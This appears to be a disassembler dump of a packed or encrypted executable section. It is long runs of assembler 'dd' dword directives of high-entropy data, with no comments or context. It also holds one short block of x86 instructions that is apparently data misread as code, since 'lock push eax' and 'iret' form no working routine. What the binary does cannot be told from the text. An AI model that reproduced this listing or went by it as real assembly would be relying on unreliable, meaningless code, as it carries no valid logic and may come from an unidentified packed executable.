dd 0DB6C2006h, 72617041h, 6E656D74h, 0FA6E495Ch, 53035EDFh
dd 33023B63h, 4C430032h, 5C444953h, 0E77ED923h, 257B00BBh
dd 2D583830h, 0FA5D3404h, 7D0361DBh, 0FCEC8323h, 0F0E89090h
dd 0DEF75706h, 60BAFBBh, 78453759h, 7C737469h, 6046DE82h
dd 62694CFBh, 3B797172h, 656E686Bh, 0BF6ED76Ch, 5FB5DF67h
dd 57791B54h, 7DF60FD5h, 0B565DBFBh, 50677562h, 6CC76972h
dd 23656765h, 7850305Ch, 642E1ED7h, 50580F2Bh, 6F114F4Ch
dd 33D5B737h, 21727270h, 2B6261C5h, 6F667364h, 62360DECh
dd 732E126Fh, 35CBB79h, 0B835A0DDh, 5C214964h, 64723A5Dh
dd 8FB10B7Fh, 5F74511Ah, 5CEC1F33h, 65704F5Fh, 0FE57B218h
dd 4478566Eh, 706E6148h, 0B5AC006Eh, 2D4D37FFh, 4B59542Dh
dd 46475157h, 0E0A4A48h, 0F9ED6113h, 4245411Fh, 48534159h
dd 5B25464Ch, 7B096702h, 32020EFh, 30231205h, 0B0EF7BEEh
dd 0B3A0F32h, 1E331504h, 7FFC8360h, 4A455767h, 4A464B57h
dd 0AB414557h, 0FE9A13BBh, 5349444Eh, 1A034452h, 0A200FF97h
dd 0CBCB901Fh, 1FA60B6Eh, 91218D0Fh, 0A4BCB921h, 31232319h
dd 6D253525h, 0D97FD3h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 57740150h
push 24h
dec ch
imul ch
adc eax, 8D1E112Ch
inc ebp
lock push eax
or [eax], ebp
movzx eax, word ptr [ebp-6]
push eax
mov esi, ds:74F3CF20h
iret
; ---------------------------------------------------------------------------
db 0Ah, 0FCh, 50h
dd 0F6F8FE04h, 0FB9B66F4h, 858D50F7h, 0F0755B78h, 3826C068h
dd 36CD10D6h, 0B017ECBBh, 14B468FEh, 0B76A0C4Fh, 4FB7F1Dh
dd 0F9F75999h, 0C283DC5Fh, 2A505205h, 345DD60Ch, 73BDCC10h
dd 38C4832Fh, 68502715h, 3B8129B0h, 5B7776DBh, 80A0BF8Fh
dd 12285750h, 5214220Fh, 647736Eh, 373015A4h, 7D330876h
dd 1766E6B0h, 6A2C310Bh, 0D8986809h, 0C9ECE761h, 28458830h
dd 66FDDB9Fh, 7909372Fh, 68234068h, 77866E02h, 606C986Eh
dd 0C95E5F12h, 0AEF22C3h, 18E11BEFh, 0A91D8B53h, 0FF336726h
dd 0EFFC7D89h, 0FFFCFF0Ah, 10C083D3h, 312C8950h, 0F08BDC1Ch
dd 0FF73B59h, 0EFDB2384h, 6A4937BAh, 3AE4680Ah, 21D1756h
dd 468D056Ah, 0DFB7F00Fh, 0F817B16h, 0D3B41859h, 0F467640h
dd 730FED6Ch, 570C1509h, 24122068h, 3FFB1475h, 0C73BDED9h
dd 18090E75h, 0EB026A04h, 0F84D8D23h, 1337F351h, 111CB3DBh
dd 5E2A2BF8h, 0C2105021h, 823B6EEDh, 5803FA08h, 840A13E9h
dd 0DD77FB62h, 300068F7h, 4C2E5783h, 3BD88B1Fh, 687D74DFh
dd 3AD95C14h, 10481BB7h, 0B70A0468h, 60440EF4h, 6ABFBB6Fh
dd 58F88BF6h, 2B58F868h, 3F45AC3h, 0C28D16F8h, 89F1F4BFh
dd 0CB2BC87Eh, 4689C103h, 7E22210Bh, 0E10DB86Eh, 23B05356h
dd 33E81040h, 0EC6FEEF6h, 0F43C2DFh, 56535056h, 8C3C1656h
dd 770974C6h, 9B8D17EEh, 0C710EB38h, 7EB0431h, 0ECDF3508h
dd 1A250699h, 7D8B0711h, 6A1611Bh, 51615B60h, 0F605746h
dd 66DF8E31h, 61FC96BBh, 0AF0F5424h, 0EB4A31Ch, 75FFFFDEh
dd 0B907A121h, 35247621h, 7BFBC069h, 0C82B7F7Ch, 0C2126851h
dd 2BD998EDh, 0D0F71D58h, 2D2474BFh, 0C7DCF6FBh, 155CC701h
dd 500CA756h, 6BCC033h, 0CA1DD33h, 0A1609A6Bh, 1A3B6C5Dh
dd 0D956D913h, 641A206Ah, 9D8DB438h, 0A2F0DE08h, 0B73816ECh
dd 3019D866h, 0F8C3522Eh, 0DA1B6B02h, 0E10C7DBh, 106A1301h
dd 0E9B3D537h, 14FCAD99h, 284BC610h, 0CD73A702h, 0FDD8780Dh
dd 7C514104h, 7A799D23h, 13E01511h, 59B5E078h, 44CF1F92h
dd 0DB541112h, 0ED372E9h, 83F08B74h, 3902F74h, 5B64D9E8h
dd 0A0567832h, 9D351270h, 6C572119h, 1F5E681Bh, 8986EF8Dh
dd 0DB33537Dh, 64405357h, 6FBDEE90h, 5B83E70Bh, 0BE566C74h
dd 0BF6AA218h, 538C6667h, 890F087Fh, 575015B5h, 3FD2D3ECh
dd 74C0858Ah, 67849F36h, 0E19939D6h, 74766CE6h, 84202613h
dd 71E3EB15h, 5B359BE1h, 895BFC14h, 0FC6157D9h, 5E3FB067h
dd 5B5FC38Bh, 5D8B048Dh, 53575608h, 0FDBEB7FEh, 3D66590Eh
dd 3F76C88Bh, 3C80D144h, 0D745C1Ah, 0FF6DC181h, 151FAF6Fh
dd 0EBEC77C9h, 3B664101h, 1B2373C8h, 0BE17FFC9h, 6DF002B4h
dd 1778F12Bh, 8148DC5h, 1A148A47h, 61059488h, 6D7B6376h
dd 7E6DC718h, 0C62F7AEBh, 90A618B7h, 245C644Ch, 0AF9D560Ch
dd 57FFDDB7h, 10247C8Bh, 197EDB85h, 2EAB0A6Eh, 7D1A6AC0h
dd 0FFFEE678h, 8861C280h, 3B463E14h, 80E77CF3h, 32001F24h
dd 2C02109Fh, 8FFFF8ECh, 84D8B0Ch, 0D895648h, 777550BCh
dd 237BF0C6h, 0A151930Bh, 536FF898h, 0B0B64F84h, 0FC1BDA0Bh
dd 2404C711h, 7B01C75Ch, 59D676F6h, 2E7559D7h, 13546815h
dd 0B37ECBF0h, 93B4E1Ah, 4080B27h, 0E1610CEBh, 68F1BDAFh
dd 0A929193Ch, 505959E0h, 95F7C358h, 0CC27027h, 1703189Bh
dd 0B3637289h, 6801FB3Dh, 0D1261294h, 3DA88F59h, 85BD95B7h
dd 1FE934Fh, 0BF5D940Eh, 64C9C9ADh, 7B575D9Ch, 7C9DF8F0h
dd 30BB6D93h, 9F6880A5h, 0B44EB1E1h, 0C0A359CDh, 0ACA43F00h
dd 315F5F7Bh, 12353C7Ch, 960C7024h, 4505B36Eh, 0E564BFA0h
dd 5A786657h, 6DB755A0h, 9B9C2613h, 5FDB93Dh, 0E8E6EBEBh
dd 34680CFCh, 6CC7580Ah, 7B167716h, 2733756Ah, 5F17E15Dh
dd 0E804F7E3h, 0E69FD8CDh, 0A2F18B76h, 0C79CFC18h, 41135006h
dd 0E3998C65h, 196A1A1Dh, 0B60514C0h, 26108D66h, 1F20B710h
dd 57816E74h, 257126Dh, 6F09B0C3h, 0D7611EB5h, 0B7518C8h
dd 2DC05935h, 147E89FFh, 57571CEBh, 0AC470957h, 3EB799BEh
dd 99741446h, 16012046h, 5FC68B1Ch, 0C6D77F68h, 6283568Dh
dd 44F6420Fh, 20010824h, 11DB66D8h, 1D5920D6h, 3DA21B5Eh
dd 0FB59BB6Fh, 9D5C8BEAh, 74037468h, 0DB768BD7h, 14ED95A3h
dd 5609F685h, 752A6146h, 0B7F6FB7Fh, 0F03BDF1Ch, 718D0375h
dd 8318515Bh, 392527FAh, 6752045h, 0FDB035B2h, 5104C183h
dd 20D003EBh, 14021847h, 0D674B3F5h, 4552AF10h, 1CC25DB4h
dd 0D8055EB6h, 7AC4B870h, 0E510E41Ah, 4FF42BEh, 20C46818h
dd 896A9A7Ah, 0CED8C847h, 86A00E4h, 0D8C8CC18h, 0C4202BD8h
dd 4C351016h, 0D03211D9h, 0B08D18D4h, 0B2C1A05h, 0D81B6914h
dd 8E7C1D19h, 0A04514h, 565E5308h, 12CC170Ah, 4D61605Eh
dd 660BB8FCh, 940AC604h, 83ABC040h, 0DDEDC0B3h, 21170BDh
dd 0EA8B0575h, 12CB3CEBh, 0C187CD06h, 6810AFBCh, 1A8A53A4h
dd 36276FCh, 3931EB76h, 0BA5D0C7Dh, 191E05D2h, 2EB17D0h
dd 5BB81EE0h, 30F6DD6Bh, 8D00575Fh, 0DC91AE71h, 344AC57Eh
dd 0E942189h, 6DAE08C2h, 0BF98F138h, 78570880h, 12DB098Eh
dd 85E8BEFh, 2F0C331h, 74C3FDF4h, 7449205Ch, 0C7C82C14h
dd 0A2659BA1h, 7AC4660Dh, 5C68DD4Ah, 4D6D46E2h, 510CEFE8h
dd 63FFBA4Fh, 0FC26F135h, 0C01BD8F7h, 5FC2456h, 9B5071E4h
dd 6FC5D483h, 0E59518A8h, 0B36AC503h, 0FFB191B7h, 753BC445h
dd 93C0940Fh, 1F068FB6h, 4A3EF9D9h, 0B18BCC26h, 4D17DE35h
dd 6895910h, 0CFA69106h, 0B986F977h, 8A040883h, 1010E04h
dd 5D270C46h, 106D78FBh, 7AD518E7h, 534244C7h, 76398D9Dh
dd 0F66AD943h, 57465945h, 0B2436206h, 3D06CB3Eh, 2B6DF6AAh
dd 0B54CB46Ch, 89630CC9h, 4B565F01h, 5DDC6214h, 418B4C5Bh
dd 0B455A420h, 314CDED6h, 3F6856E1h, 5D00A4CFh, 88661647h
dd 5741415h, 336CEB67h, 0A6278CDCh, 1DA9AAh, 9C1B6332h
dd 0F5E6803h, 2F6DB804h, 66602061h, 573B60Fh, 0BB648AFBh
dd 9897785Eh, 1261C10Bh, 52135868h, 0FBC228D0h, 0A1642E21h
dd 25896408h, 0C7CEA307h, 0D22CDDC6h, 0A5E86589h, 27240C29h
dd 7BD757F4h, 30BBBB0h, 0F86850C3h, 0B76CC0Ah, 4014E4B4h
dd 0E12E0F40h, 0B916D170h, 0AF3861E0h, 0A9522B34h, 6BFBF192h
dd 9B6990B3h, 94DC1AFAh, 85930D9Bh, 4390A153h, 5B4F9493h
dd 16F8B6EBh, 42392FE4h, 45F7DB08h, 0DA2DC0BFh, 7C5B3BC8h
dd 201E7C80h, 44C60573h, 6FE25A6Dh, 0EB402E06h, 1F76FFE9h
dd 0E0757546h, 86E1BC3h, 0E00381AEh, 0B9616480h, 3105BAB1h
dd 4D450CCh, 0A6DDA60Ch, 1D5FA246h, 50DA1E08h, 0CF3CD804h
dd 0D4D63CF3h, 9ED2CECCh, 46D979E7h, 746B60Ah, 6A040506h
dd 18F9EF9Eh, 2040308h, 53B60601h, 6A716023h, 58859215h
dd 0E8130340h, 98C95790h, 0BF723EC4h, 0C49A8598h, 50AE2350h
dd 6B6F683Fh, 21D00ADCh, 59504208h, 623E3786h, 0C483D911h
dd 0D20EEBFFh, 0C2BE1696h, 0C758BC3h, 0F185598Bh, 37D3D907h
dd 0CF1CBEFAh, 0E07D83h, 160EE070h, 96841A46h, 0B4F072CCh
dd 8A70F20Dh, 0D8FBCE71h, 0C9F0F468h, 0C8833811h, 0CDF6ABFFh
dd 9FA17C2Ch, 3B0C55C0h, 0D7992D6h, 0B42E9EA5h, 1DE677FCh
dd 7AF286E4h, 0BB4BFFFFh, 0CE8B135Eh, 0CA3BDCA6h, 48A2973h
dd 0C0458839h, 972303Ch
dd 1D73393Ch, 7D778F4Dh, 0D6AC0F8h, 74B84B0Ah, 8BE4797Fh
dd 6EBD8F1h, 0FD0EB41h, 28850F39h, 0BD1FEDBCh, 3BF64A8Dh
dd 5C1548F1h, 0DFFFFD73h, 8D0088D1h, 0C13B144Eh, 0C23B2A7Dh
dd 0C8A2673h, 0BC4D8838h, 9A2DF980h, 0A53B6B1h, 0C9595404h
dd 37DBDB77h, 253075DBh, 65830409h, 391000D4h, 0AFA0D44Dh
dd 76DED966h, 3B568DBFh, 8A1F75C2h, 0D8E8B838h, 80C9A78h
dd 43A41905h, 0D8CC36C1h, 0D4ADF8D6h, 5181802Eh, 3C62D0F6h
dd 8D0B0211h, 77770CD0h, 8D020FD8h, 1B503E04h, 3E440E02h
dd 639E0F02h, 46D0498Ch, 5C1180D3h, 8D00AD8h, 83C40B12h
dd 37B704C8h, 5C24AEEh, 0C40A7F32h, 4057C01h, 895D7E0Ch
dd 0A1A06237h, 6E31043Eh, 5AD40506h, 7530E6ECh, 74310607h
dd 30032C18h, 97AD1B0Bh, 6846D709h, 6D4A10D8h, 921418BBh
dd 0EA76E00Ah, 30A10B84h, 0C3C3C588h, 0E4239098h, 9CDB5878h
dd 0C5691967h, 5DB3D35Dh, 3C80FDB0h, 662E9EBFh, 2F4F048Bh
dd 7E10F2A0h, 0D7C35B9h, 0E33A097Fh, 0C33BC475h, 5321C972h
dd 61505BCBh, 2E5335BBh, 470C572Ah, 7EC59C62h, 7CB2BF08h
dd 75EB590Eh, 75CB3BC9h, 2CB0D332h, 5D5D974Ch, 0B34DEFC6h
dd 753DBF74h, 98479124h, 0B1640C10h, 9DCB3043h, 0C26F3394h
dd 0CBBBC3E9h, 0BE4C5306h, 1966900Bh, 4CACC84h, 5FF2C477h
dd 770465C2h, 0C483DA04h, 6A535330h, 0DF074C0Ah, 0FF0CACD6h
dd 20AB5325h, 0CE46497Ah, 27CCB815h, 0D91BD9AFh, 1EA8E4AAh
dd 9037D90Ch, 0A48D91h, 0F3A3A8A8h, 66F1A36Fh, 857C83h
dd 300A0710h, 304B0875h, 310CEC3Ch, 9E0F75BEh, 11C847FFh
dd 885216C8h, 394AE60h, 6EB7FA26h, 5CFD4B46h, 6212ECEBh
dd 57C33DC8h, 0C58B7D68h, 6177E80h, 0CE6D423Ah, 196D866Dh
dd 0F51A1CA5h, 29C11E05h, 936CD263h, 24D00C22h, 0D6FABE8h
dd 2B365EFEh, 9B3003F3h, 56EED1B8h, 6DAFC116h, 0C60E16F0h
dd 140A0DFFh, 0B472B54Ah, 6F202A2Ah, 50B33709h, 903722A8h
dd 11740BF0h, 28D1BF6Eh, 2B990F39h, 0EF8D1C2h, 56B1027Eh
dd 0F923EB63h, 0AB2C0D33h, 0D1CB7615h, 0F9D10F6Fh, 5F70818Dh
dd 66057E27h, 0E9A17FB7h, 0AC16EBACh, 3B0279FEh, 4173B87Dh
dd 2D2BB8F8h, 0EC1342F6h, 1F04AD90h, 2D726750h, 3DBC4B6h
dd 0D19015F7h, 55C7D8E8h, 0F336DB19h, 165543A3h, 6F470B0Eh
dd 1EDF647Dh, 3BF07FFFh, 8D067CF7h, 0BAEB017Eh, 0A4C7814Fh
dd 0FE3BA6E2h, 0FC1E0473h, 0F78BD5B6h, 0FC5F4EACh, 0AC752B00h
dd 90A17622h, 24A30Ch, 0A6040789h, 0A4FB5CD9h, 0F5044789h
dd 0C80807F9h, 528512B4h, 98A7A9CBh, 1A3721C0h, 1047322Bh
dd 0BA10B110h, 0C7448E95h, 0D527A1A5h, 4582AA32h, 186E401Dh
dd 3C609436h, 48689757h, 76192BB5h, 15B8A05Bh, 9E9C980Eh
dd 0E9518E0Ch, 0C73E9193h, 0E05DCE35h, 1E142A2Eh, 46110B74h
dd 5BF86A6Eh, 9A04850Bh, 0B88C8B5Ah, 0CA532084h, 5B1F77B9h
dd 0DC24D771h, 1AE85589h, 4BD3C8Dh, 69AD7E17h, 72B43C9h
dd 0A4028DA0h, 0D49F1B10h, 0F5608501h, 0FEBB0300h, 0E0358605h
dd 0F9B86857h, 85731345h, 0B80ECC30h, 893E4816h, 0EC18DB59h
dd 62853913h, 0A441AFA2h, 0ACEA01A3h, 72696BE0h, 0FF646F7Fh
dd 4E5D0734h, 12C540BBh, 0CD9B82A0h, 97314A95h, 50271068h
dd 39CE84ECh, 0CDE98C4h, 0EE721183h, 7A3D8BA5h, 0A0B912FEh
dd 52C5A8DBh, 0AC017CC0h, 0DBFB7B1Bh, 18397517h, 0B37EBE5h
dd 0D01C8DE0h, 0F65C6C51h, 110319B0h, 0F2001BEh, 0B1DBFD7Bh
dd 1B06282Bh, 151ABD6Fh, 0B5FFCC38h, 99F9A3C4h, 0CCD04DCDh
dd 8C0E1863h, 0B0DDDBBh, 84EB711Eh, 0D31B30CBh, 9D90D868h
dd 75B8B9ECh, 4B4F9969h, 13261098h, 80535306h, 404C244Fh
dd 6A91EB4Eh, 1304B764h, 87EB5F47h, 8C6439Ch, 0DB86C20h
dd 0ABBAE88Ch, 6A4263C7h, 0D72F5D34h, 0C6C70C11h, 6359F460h
dd 0B2C87DAFh, 0B8500460h, 91223F0h, 8C1911ECh, 0EEC86154h
dd 8359C80Bh, 4D8351C7h, 60C07CC8h, 5778EBF1h, 45F1C28h
dd 5AF08EC6h, 0AC0B1B6Bh, 4C330E8Bh, 9899DAB7h, 213976D0h
dd 51A6C8B5h, 24CFB833h, 0A2893E89h, 4420FCBBh, 527DB884h
dd 84AF6425h, 477E97D6h, 0C208C683h, 5ECF72F0h, 0CC0400A7h
dd 5F78D81Dh, 0D574C4C7h, 0AE075328h, 0D1350CBFh, 280F474Ch
dd 666A9F11h, 138B67E8h, 25FF2C11h, 91054808h, 4C8C8E7h
dd 0F410F800h, 919AC16Ch, 0CCECF0h, 0EC27E819h, 0DCE08C8Ch
dd 0F33D5100h, 767D1BF6h, 7208F58Dh, 87E98114h, 162D662Dh
dd 85EC7F6Fh, 0EC731701h, 0C48BC82Bh, 8BE18B0Ch, 0B748C8F1h
dd 0C33140C1h, 8C88804Fh, 8CC8869Fh, 60B8E999h, 0C96F6029h
dd 3A1D77C9h, 88C813h, 0F4F7284Ah, 19930520h, 7E1680E1h
dd 0D03DCC39h, 271B34F7h, 6F5085A8h, 0DF1B4820h, 0D97972Eh
dd 2C32132Bh, 2A7410DCh, 4BCB3580h, 6C1C2F7Ch, 0CB203A27h
dd 142FD6E5h, 30585811h, 0AC765CDAh, 132B805Fh, 0E8112898h
dd 578C2089h, 9F7202A6h, 0E6B5BFE5h, 6D029709h, 70636D65h
dd 65739979h, 97FCB3B9h, 7302BE74h, 656C7274h, 0C302C56Eh
dd 6BCFDD3Bh, 1D616309h, 0D3A631BAh, 3F7FB76Ch, 5940333Fh
dd 2505841h, 0F0F5A40h, 0F837FD32h, 0F490E3Ah, 7865AACAh
dd 74706563h, 6EDD685Fh, 725243D1h, 43023DC1h, 0ADB3696Fh
dd 491BB2FDh, 7878435Fh, 48758546h, 0DEA3781Dh, 4513AF0Ah
dd 6C825F48h, 0BD42676Fh, 0D0310B41h, 7B545243h, 3DB67D9Ch
dd 14E4957h, 38F0C45h, 0B6418A6Ch, 7933DEE0h, 240BAA0Bh
dd 76A83743h, 0BDBFB542h, 54600D60h, 7474DEDBh, 6FD35265h
dd 0B7BA8105h, 37FFDB6h, 0E697257h, 73966250h, 721B4D73h
dd 0EED7FB9Bh, 470189C7h, 644113F6h, 11177264h, 0A5D82E67h
dd 6C75213Ah, 0D8095F4Fh, 356FFDAh, 74726956h, 416C6175h
dd 84452A84h, 751CC10Ah, 4C310261h, 0EA9BB535h, 695433FFh
dd 6F436B63h, 2074E75h, 86B60649h, 2BD5AEEDh, 2E64656Bh
dd 97670363h, 0C04AEB57h, 50754D41h, 930F6555h, 0A1364DEAh
dd 0DAD1452Fh, 5961FDFEh, 6C5F0388h, 0F500DB63h, 461D5302h
dd 0A56DBC80h, 0D6D6710h, 9E47014Fh, 8BDD70E0h, 0B8F6F25h
dd 0D5797021h, 0A66BF6B6h, 0F795323h, 1EBE44EBh, 0C5AE6ECh
dd 27316F1h, 4E32335Bh, 26B2BB6h, 497530D7h, 0E6C8718Ch
dd 6525CB68h, 0DF68AD06h, 6F70AA96h, 1870B0A3h, 70616E53h
dd 46DD6B61h, 0D51B6F28h, 1E627F43h, 82DB784Bh, 6D654144h
dd 0BB4645DBh, 4EA57C33h, 32915EAh, 37140B53h, 0EC16D8h
dd 6E1A2FDAh, 0F92FD230h, 0D5AACD86h, 0C85AC3ACh, 4CF2DAD6h
dd 11A04561h, 66F74685h, 76453B9Dh, 0F4A1FAEh, 0C2B46064h
dd 7F7AAEh, 49FB6544h, 671E886Fh, 4C76D6D5h, 1F31E500h
dd 80007965h, 2ED56137h, 5DC88702h, 13868D96h, 6592453Ch
dd 4466123h, 68D80160h, 426C2553h, 0F8D4CF75h, 4902A900h
dd 2DEB721Ch, 0AD6C735Bh, 430A7043h, 53C2694Ch, 7386C9BDh
dd 765F3D21h, 4B08C288h, 9F79D528h, 0F436BBF1h, 0FF501C68h
dd 45007D18h, 0F6532EDBh, 69694508h, 9F685C64h, 428DB76Ah
dd 146C2767h, 0CA267942h, 55D1CE6Eh, 6927284Fh, 330787Ah
dd 9B556309h, 6AB00F45h, 0F8DFE9h, 3C52454Bh, 5D0BC74Ch
dd 2D870A9h, 6682635Dh, 0C2187B71h, 0FC80258Ch, 0E9C371D6h
dd 65061789h, 64D07267h
dd 3B36ED25h, 0E3007Ch, 553F0CAFh, 76B65A53h, 1C5761E1h
dd 756AF900h, 0B06BB3EEh, 149C009Dh, 17D73B7h, 0ADC936C3h
dd 7075126Fh, 0A7759656h, 6901621Eh, 343D01A8h, 16F0528Bh
dd 0C620D48Eh, 0F8A9654Bh, 4336440Dh, 9A3034CCh, 0D6D8CC1Fh
dd 20EC3BDFh, 56444112h, 4B83496Fh, 25617942h, 27556F43h
dd 67856C11h, 47300F66h, 390F5475h, 0D6036B0Dh, 916F1F49h
dd 5160AE3Ch, 0FFCE0084h, 3F50DFD6h, 60335C33h, 3A336C33h
dd 3380337Ch, 0FF90338Ch, 33FF06FFh, 33B933AFh, 1BEB33C4h
dd 22340934h, 53343134h, 79345A34h, 0FF348434h, 0A8FFFFFFh
dd 0CC34BB34h, 634F634h, 31352B35h, 4E353B35h, 7D355D35h
dd 8E358835h, 9D359335h, 0FF35A735h, 0B4FFFFFFh, 0EA35D335h
dd 1035F535h, 40363536h, 5B364836h, 66366136h, 90367736h
dd 0AB369736h, 0FF36B236h, 0C2FFFFFFh, 0E636D136h, 18370436h
dd 2A372337h, 53373937h, 6F376837h, 0F237C237h, 6937F937h
dd 5638B738h, 0CCFFFFFFh, 0EB38DE38h, 2938FF38h, 5C395039h
dd 94398039h, 0A5399A39h, 0A539B839h, 0FFFFFFFFh, 39CB39C5h
dd 39D839D2h, 39E539E0h, 3A0D39F8h, 3A4F3A48h, 3A923A84h
dd 3AE43AA5h, 0FF3F3AEDh, 3BF16FFFh, 0E273C12h, 3F3C383Ch
dd 0A33C5E3Ch, 0BE3CB13Ch, 43CF23Ch, 0FF3DC73Dh, 0E5FFFFFFh
dd 133DF53Dh, 343E183Eh, 793E3A3Eh, 983E7F3Eh, 503EE93Eh
dd 643F573Fh, 7B3F6B3Fh, 3F3F863Fh, 98FFC34Ah, 0D13FCB3Fh
dd 0F13FEC3Fh, 73200F3Fh, 0FFFE302Ah, 31B0FFFFh, 330A31B5h
dd 332A3320h, 33B03337h, 355333B5h, 36153566h, 3633362Ch
dd 3657364Ah, 0FFFFFFDCh, 36ECC3EFh, 37B43758h, 37F437C8h
dd 383637FAh, 38473840h, 38873859h, 38A03899h, 0BFFF38A6h
dd 38ACFFFBh, 38B838B2h, 38C438BEh, 0D1D838D2h, 39283922h
dd 393D392Eh, 39683951h, 40043984h, 3990E358h, 9200F0ACh
dd 0FF8A1281h, 0FF65F7D0h, 0D00F75ABh, 0BE6E3149h, 1ABF031Ah
dd 37DD0715h, 4D687CDFh, 37361AADh, 3F1AB44Dh, 1AB868F6h
dd 4F522730h, 69E71464h, 5076863h, 0B535F700h, 727CE4B9h
dd 31400140h, 2EB079Fh, 97139ABEh, 0D2C31A0h, 0E9D8C80Bh
dd 403F601h, 7BC51927h, 0CA3BA0F2h, 0DB0725FEh, 7C538A31h
dd 34603A30h, 0CEC2689Fh, 0E00492BDh, 304F2338h, 0BC28A703h
dd 831CC840h, 2A7676A9h, 295407A3h, 0A207602Bh, 7628C2Dh
dd 642B3B92h, 7461525Eh, 80FBE761h, 46435307h, 0D8C80731h
dd 58DD65B2h, 2307AF54h, 0B34F072Ch, 0E21D0A8Dh, 0D19F2Eh
dd 98A323EBh, 780F37Dh, 60E13B57h, 2B27F14h, 0ED07C003h
dd 7F314651h, 0EB0332E2h, 0ACB36CEh, 32F61833h, 0AA0BC013h
dd 9A69A603h, 60DE94A6h, 0B2C8384Ah, 10FA9AEBh, 7A8B267Fh
dd 34D34433h, 3BC6375Dh, 7E9603B2h, 34D3656Ah, 2E3E5E4Dh
dd 9A31FE16h, 0E69A69A6h, 8CA6B8D0h, 9630E374h, 93315C6Dh
dd 0DF27025Bh, 4AA40414h, 83535126h, 722EFFC9h, 0C1F954BFh
dd 20BB5051h, 0EAB75F20h, 0C5FC821Fh, 7D8B2856h, 88B9C5FCh
dd 778297D4h, 0F3C0332Eh, 358B5DABh, 0B73D0328h, 88A06E89h
dd 0E88845E4h, 6C8C1405h, 0E08EE93h, 0D8D41DE4h, 872321C8h
dd 78DCD4D8h, 0E0C87632h, 5DC0EE0h, 0EF92E4ECh, 0AD6E123h
dd 0B9FFF4FCh, 0C0839EC1h, 0AC04133Ch, 33FC4EA6h, 0B78239F6h
dd 0F875F772h, 68144875h, 382205FCh, 0CCD6646Ah, 0C4C83DF7h
dd 13221B22h, 333BEF18h, 1C1634D9h, 0FF147414h, 500F3870h
dd 1682BAFBh, 1009FC8Bh, 0A214EAh, 0E0CCBE7Ch, 0E14BF8D8h
dd 0CC86192Eh, 0F105F7Dh, 1CA8EB7h, 70AC763Fh, 8D282A21h
dd 3B07F1BEh, 0C81274C7h, 8BFFEEF6h, 88B0450h, 890A8950h
dd 441B0451h, 1DE8EB5Eh, 3D8FB7D4h, 588D3F72h, 3D831FC4h
dd 4192C60h, 5B6F4175h, 4E8D0CF1h, 0B02BA3Ch, 0CD404688h
dd 0A1DB0FD8h, 0C91AD24Ch, 1D40568Ah, 23D9EBA0h, 4ABBB640h
dd 0EE76FFDCh, 0B67E10E1h, 8D2E3407h, 354F4786h, 528FB10Ch
dd 0DC560114h, 141AFF03h, 0D10E87A9h, 85F88B2Eh, 55B41FFFh
dd 8A973F3h, 186783h, 11C47C7h, 73750DE1h, 6240600h, 8D0E460Dh
dd 4F8FB28Eh, 4789FBC7h, 9E258A20h, 0F7768688h, 1A67F6B7h
dd 8904438Bh, 38041F1Fh, 8A047B89h, 0DB361896h, 0AC97B367h
dd 0D0157505h, 8E760040h, 47585EECh, 0C4B6FF4Dh, 7607EB0Bh
dd 1B1C3658h, 8550A536h, 0E1803D07h, 9B3C2F34h, 636951CDh
dd 7194F8Bh, 66C60189h, 4889DEC9h, 0C260735Ah, 6E7B645Eh
dd 0B2ABC7C0h, 0B008B6C4h, 0CDDD3399h, 5AD0BD02h, 0B6579D83h
dd 0F21D8BB8h, 2B0AB84Dh, 2AC38011h, 2B5906FBh, 0D31EC01Bh
dd 0D0DF0BB9h, 8E5D8D30h, 247C83CCh, 0E10FD308h, 99012DFEh
dd 8B470Ch, 0A06B08A3h, 0B1B6C058h, 96CCC9C2h, 60170DD7h
dd 0BFB89A4Bh, 0EDB79BBh, 5E8B7FE0h, 0E3B8060h, 4B8B4475h
dd 0C2538BF8h, 0F0176D4Dh, 0C0BF0B7h, 0F981FF33h, 0F445D9E0h
dd 9BD2C410h, 4174F8EDh, 3974E40Dh, 52FB5D8Dh, 4DBB75FBh
dd 7751509Ah, 9643E50h, 4B0DBF51h, 0D2EA97E0h, 89D2322Fh
dd 4689187Eh, 768B301Ch, 8BC4C225h, 0D9F044C7h, 51CD16F0h
dd 4C6030FFh, 0EDCA7454h, 6B9F2D23h, 58F685F0h, 46C60CDBh
dd 0BF63DB64h, 6846DDFBh, 44B3B89h, 153C850Fh, 0F0DF983h
dd 0F41E3382h, 1A37DB37h, 0CC255D8h, 2210CA3Bh, 16F87D81h
dd 9F7FC1EAh, 46C70975h, 6673C618h, 0D85C23F6h, 8D1A8BE3h
dd 1C4E719Fh, 50C488Dh, 0F6DBE106h, 0D7408B20h, 892455CBh
dd 874AEC5Dh, 46BFB16Fh, 878D928Fh, 6F42BE4h, 0C6783189h
dd 7089C2C8h, 13CB9756h, 42005D8Bh, 430F585Bh, 0BAC6481Dh
dd 0CD20CD2Ch, 7746B746h, 0D52B6857h, 0F7B910F9h, 6185C1DBh
dd 3135170Bh, 0AC0C1DF4h, 8A0D0B2Ah, 3BE4B574h, 0B5A1286Eh
dd 4189DB80h, 49F0459Ch, 61704444h, 0E689E086h, 76704EA6h
dd 6F1B272h, 569BEC97h, 88609F2Ch, 0CB73C5F5h, 0EE437389h
dd 0C68762CDh, 26572278h, 8BE0861h, 0C5DF169Fh, 0BDDB6205h
dd 1CBB1424h, 0DE778BC8h, 9399CC3Eh, 0CF17DCDh, 10020C39h
dd 0B3E1D3B8h, 5751CEBh, 0A3030BE8h, 0E04AEB30h, 0D866CF6Ch
dd 0D12DD56h, 56CCC941h, 0AF492043h, 25163C6Bh, 5D410052h
dd 490D5203h, 732F9Ah, 57005F1Bh, 24C15B4Eh, 0D1102405h
dd 1BA2DC08h, 8D7A5070h, 538A305Eh, 0BBA14566h, 0AFC45h
dd 0F33BFA05h, 0B90BB5D9h, 121C0972h, 0EF20CF0h, 64F3E6CDh
dd 18E87EF4h, 8EEC1AEAh, 8B5EC6FFh, 0C084D7F8h, 45AB2175h
dd 0F82140Ch, 7E85927h, 23350332h, 363B236Ch, 418A564Ch
dd 3F6EA48h, 11BB5B91h, 3F0B02C2h, 0E4880C06h, 10E7C8F3h
dd 0D8140E1Ah, 1C0BC018h, 0F9F9F9E4h, 103E2079h, 28137C24h
dd 9A2C0CC8h, 85AE1C0Dh, 2847663h, 85CC3A5Dh, 0DDFD0A66h
dd 0D62C144Ah, 641BADEEh, 20038B1Eh, 0E68A17Ch, 0FE420789h
dd 4D8F9F4h, 89047808h, 0C606EB3Dh, 1B03E42h, 9142A75Bh
